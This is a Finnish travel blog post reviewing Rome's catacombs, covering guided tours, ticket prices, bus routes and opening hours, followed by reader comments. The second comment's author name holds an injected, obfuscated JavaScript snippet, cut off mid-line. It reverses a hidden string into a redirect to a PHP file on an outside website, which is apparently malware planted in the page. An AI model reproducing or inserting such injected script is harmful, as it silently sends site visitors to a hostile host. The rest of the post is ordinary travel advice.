Luin vähän aikaa sitten jostain matkasivustolta tai ehkä -blogista, että Pariisin katakombit olivat jutun kirjoittajalta jääneet käymättä, koska niihin oli niin hirveät jonot. No, tätä ongelmaa ei ole Rooman katakombeissa. Niihin ei riitä turisteja jonoksi asti, mikä on tavallaan aika yllättävää: ovathan ajanlaskun ensimmäisillä vuosisadoilla rakennetut Rooman katakombit kuitenkin peräti 1500 vuotta vanhempia kuin vasta 1700-luvulla rakennetut Pariisin katakombit, niihin on haudattu tunnettuja pyhimyksiä, marttyyreja ja jopa Raamatusta tuttuja henkilöitä ja ne kertovat muutenkin paljon alkuseurakunnan historiasta. Siis sen lisäksi, että ne ovat hienoja maanalaisia käytäviä ja saleja tietenkin.

Katakombeissa on kuvaaminen kielletty, joten tämä kuva on lainattu täältä.

Rooman katakombien epäsuosioon on mielestäni muutama selkeä syy. Ensinnäkin ne eivät ole mikään yksi yhtenäinen nähtävyys, vaan katakombeja on useampia, yhteensä jopa kymmeniä eri puolilla Roomaa. Yleensä Rooman katakombeilla kuitenkin  tarkoitetaan Appia Anticalla olevia tunnetuimpia ja suurimpia San Calliston, San Sebastianin ja Domitillan katakombeja. Nämä sijaitsevat lähellä toisiaan, mutta niihin ei kuitenkaan saa yhteislippua, vaan jokaiseen katakombiin on lunastettava 8 euron lippu erikseen. Turisti joutuu siis valitsemaan, missä katakombeissa haluaa vierailla, sillä niin isoja eroja niiden ja opaskierrosten välillä ei ole, että kaikissa kannattaisi käydä (ainakaan yhdellä reissulla).

Toiseksi katakombeihin pääsee siis tutustumaan vain opastetulla kierroksella, mikä on sinänsä aivan ok ja ymmärrettävää: mikään muu ei kai olisi turvallisuussyistä edes mahdollista. Mutta onko niiden opastusten pakko olla niin kuolettavan tylsiä? Tietenkin on kiinnostavaa tietää, kuinka monta kilometriä käytäviä on, kuinka monta vainajaa niihin on haudattu ja millaiseen maaperään ja miten ne on rakennettu, mutta voisihan näitä kylmiä faktoja edes vähän värittää tarinoilla. Katakombien historia ja sinne haudatut vainajat tarjoaisivat siihen kyllä oivan mahdollisuuden. Leukani loksahti alas, kun opas San Calliston katakombien viimeisessä kryptassa selosti, että sinne oli haudattu aikanaan apostolit Pietari ja Paavali. Siis ihan noin vain samantapaisena mainintana kuin että katakombit on kaivettu tuliperäiseen tuffikiveen, jota oli helppo kaivaa.  Voi olla, että Pyhän Pietarin – JA Paavalin – hautapaikka on oppaalle arkipäivää, mutta voin vakuuttaa, että tavalliselle turistille se ei takuulla ole. (Sittemmin niin Pietarin, Paavalin kuin muidenkin pyhimysten jäännökset siirrettiin turvaan ryöstelijöiltä Rooman kirkkoihin. Vatikaanissa oletettavasti olevan Pyhän Pietarin haudan päälle rakennettiin Pietarinkirkko ja Paavalin haudan päälle San Paolo Fuori le Muran basilica, joka on yksi Vatikaanin neljästä kirkosta Roomassa).

Viimeisenä, mutta ei vähäisimpänä syynä alhaisiin kävijämääriin on se, että katakombeihin on ihan hirveän hankala päästä sekä niiden aukioloaikojen että yhteyksien vuoksi. Ne sijaitsevat kaupunginmuurien ulkopuolella Appia Anticalla, parin kilometrin päässä Colosseumista. Katakombeihin pääsee bussilla 118 esimerkiksi Circo Massimon edestä tai bussin päätepysäkiltä Piramiden aukiolta (molempiin pääsee B-metrolla) tai bussilla 218 Piazza di S. Giovanni in Lateranolta (A-metron pysäkki). 118 kulkee kuitenkin vain 2 kertaa tunnissa, eikä aikatauluja tietenkään ole missään, joten pysäkillä voi joutua odottelemaan kauankin. Myös palatessa. Ei siis ihme, että Appia Anticalle vievien ruuhkaisten katujen varsilla näkeekin usein turisteja, jotka ovat päättäneet lähteä katakombeihin kävellen. Paikan päälle opastavat kyltit ovat kuitenkin harvassa ja katujen ylittäminen ja niiden reunamilla kävely hankalaa arkisin, joten suosittelen kävelyä paikalle lähinnä sunnuntaisin, kun Appia Antica on suljettu liikenteeltä. Perille päästyä voi vielä huomata, että suunniteltu katakombikohde onkin kiinni, sillä esimerkiksi San Calliston katakombit ovat kiinni keskiviikkoisin ja siestan aikaan joka päivä 12 – 14. Ja 29.1 – 25.2., joulunpyhinä ja pääsiäissunnuntaina.

Kuva täältä.

Nyt kun nämä katakombien huonot puolet on sanottu, niin kannattaako katakombeihin sitten vaivautua? No se vähän riippuu. Jos mielestäsi lähes 2000 vuotta sitten hakulla rakennetut käytävät ja niissä kulkeminen on ihmeellistä, niin kyllä. Jos lähes 2000 vuotta sitten jonkun uhmakkaan alkukristityn kaivertama kalan kuva ja muut katakombeista löytyvä alkukristittyjen symboliikka on ihmeellistä, niin kyllä. Jos historia ja kaikki katakombeihin kätketyt kiinnostavat tarinat – vaikka opas ei niitä kertoisikaan – kiehtovat mielikuvitustasi, niin kyllä. Jos sen sijaan haet katakombeista kylmiä väreitä ja konkreettista kuoleman läheisyyttä, tulet ehkä pettymään, sillä Rooman katakombien loculeissa ei näy luita eikä pääkalloja Domitillan katakombeja lukuun ottamatta. Tosin toisille meistä jännitykseksi riittää pimeät, ahtaat maanalaiset käytävät…joihin joskus on haudattu kuolleita ihmisiä.

Kuten sanottu, opastetut kierrokset katakombeissa ovat samanhintaisia ja jotakuinkin samanlaisia: ostat lipun (8 € ja alle 18-vuotiaat EU-jäsenet pääsevät taas ilmaiseksi) ja odottelet sisäänkäynnin ulkopuolella, kunnes sopivankielinen kierros (englanti, italia, espanja, saksa, ranska, puola…) huudetaan alkavaksi ja sitten kierrät vajaan tunnin verran käytävissä, kryptissa, portaissa jne. Ai niin, portaita on paljon, joten katakombit eivät sovi kovin hyvin huonojalkaisille.

San Calliston katakombit (oma suosikkini)
Lähes 20 km pituiset ja 15 hehtaarin suuruiset San Calliston katakombit olivat Rooman varhaiskristittyjen virallinen hautauspaikka, jonne on haudattu n. 50 marttyyria. Paavien kryptaan on haudattu 9 300-luvun paavia, minkä vuoksi sitä kutsutaan myös Pikku-Vatikaaniksi (il piccolo Vaticano). 
Suljettu keskiviikkoisin, muuten avoinna 9 – 12 ja 14 – 17.

Paavien krypta San Calliston katakombeissa, kuva täältä.

San Sebastianin katakombit

San Sebastianin katakombeissa uskotaan sijainneen apostolien Pietarin ja Paavalin ensimmäinen hautapaikka. Nimensä katakombit on saanut sinne haudatun suositun pyhimyksen Pyhän Sebastianin (Sebastianuksen) mukaan. Kierros päättyy San Sebastioano fuori le mure -kirkkoon, jossa on Berninin viimeiseksi työksi jäänyt veistos Salvatore Mundi, viehättävä puukoristeinen katto ja tietenkin Sebastianusta esittävä veistos ruumista törröttävine nuolineen. Niin, ja Pietarin jalanjäljet. Kirkkoon pääsee toki tutustumaan ilman katakombikierrostakin ilmaiseksi.
Avoinna ma – la klo 10 – 16.30. Kiinni sunnuntaisin.

Domitillan katakombit
Domitillan katakombit mainostavat itseään parhaiten säilyneinä katakombeina. Ja ainoina, joissa on nähtävissä myös vainajien luita. Katakombit tunnetaan myös viimeistä ehtoollista esittävästä freskosta 200-luvulta.
Suljettu tiistaisin.


Kommentit

2 vastausta

  1. Emilia avatar
    Emilia

    Hei Heli! Tekstissäsi oli mainittu kaksi sijaintia apostolien Pietarin ja Paavalin ensimmäisten haudoille, kumpi mahtaa olla oikea? 🙂
    ”Leukani loksahti alas, kun opas San Calliston katakombien viimeisessä kryptassa selosti, että sinne oli haudattu aikanaan apostolit Pietari ja Paavali.” vai:
    ”San Sebastianin katakombeissa uskotaan sijainneen apostolien Pietarin ja Paavalin ensimmäinen hautapaikka.”

    Arvostan jos ehdit vastaamaan, olen juhannuksen jälkeen menossa Roomaan, ja kyseinen paikka kiinnostaisi tsekata!:)

  2. Ottella - Dolce macchia<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.no avatar
    Ottella – Dolce macchia